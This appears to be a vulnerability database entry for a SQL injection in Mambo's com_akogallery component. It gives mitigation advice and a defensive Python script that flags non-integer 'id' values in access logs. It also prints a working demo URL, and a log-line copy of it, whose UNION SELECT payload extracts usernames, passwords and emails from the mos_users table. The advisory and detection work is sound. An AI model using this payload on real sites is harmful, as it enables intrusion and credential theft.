Vendor: Mambo
By: Secunia Research
CVSS: 7.5 (HIGH)
Mambo com_akogallery Remote Sql Injection Vulnerability
CWE: 89
Product Name: Mambo
Affected Version From: 4.6.2
Affected Version To: 4.6.2
Patch Exists: YES
Related CVE: CVE-2006-4695
CPE: o:mambo:mambo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2006

Mambo com_akogallery Remote Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL commands into the vulnerable application. The vulnerable parameter is the ‘id’ parameter in the ‘com_akogallery’ component. By manipulating the ‘id’ parameter, an attacker can inject arbitrary SQL commands into the application. This vulnerability affects Mambo versions 4.6.2 and earlier.

Mitigation:

Upgrade to the latest version of Mambo.
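Beyond upgrading, the component-level fix is to accept only an integer `id`, and the same rule doubles as a detection check over access logs. The following is an added example written for this page, not Mambo's or Exploit-DB's code; the Apache-style log lines, hosts and timestamps are constructed, and the injected request mirrors the shape of the demo URL shown in the raw data below.

```python
"""Integer-only 'id' validation for com_akogallery plus a log scan for violations.

Assumptions (not from the advisory): combined access-log format, sample lines
constructed inline; only requests with option=com_akogallery are in scope.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (hypothetical hosts and timestamps). The second
# line carries the injected id from the advisory demo, with '+' for spaces.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2006:10:01:02 +0000] "GET /index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=17 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Sep/2006:10:01:07 +0000] "GET /index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4+from+mos_users HTTP/1.1" 200 7342
10.0.0.9 - - [12/Sep/2006:10:01:09 +0000] "GET /index.php?option=com_content&id=5%27%20OR%201=1 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def id_is_safe(value: str) -> bool:
    """The rule the component needs: 'id' must be a plain (optionally signed) integer."""
    return re.fullmatch(r"-?\d+", value.strip()) is not None

def flag_request(target: str):
    """Return a finding if the request targets com_akogallery with a non-integer id."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_akogallery":
        return None          # other components are out of scope for this check
    for raw in qs.get("id", []):
        if not id_is_safe(raw):
            return {"component": "com_akogallery", "id": raw,
                    "union": "union" in raw.lower()}
    return None

def scan_log(text: str):
    """Parse each log line and collect findings with source IP and timestamp."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = flag_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the com_akogallery request with the UNION payload is reported; the integer id and the out-of-scope com_content request are not.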

Exploit-DB raw data:

Mambo com_akogallery Remote Sql Injection Vulnerability

Demo:
http://server/index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users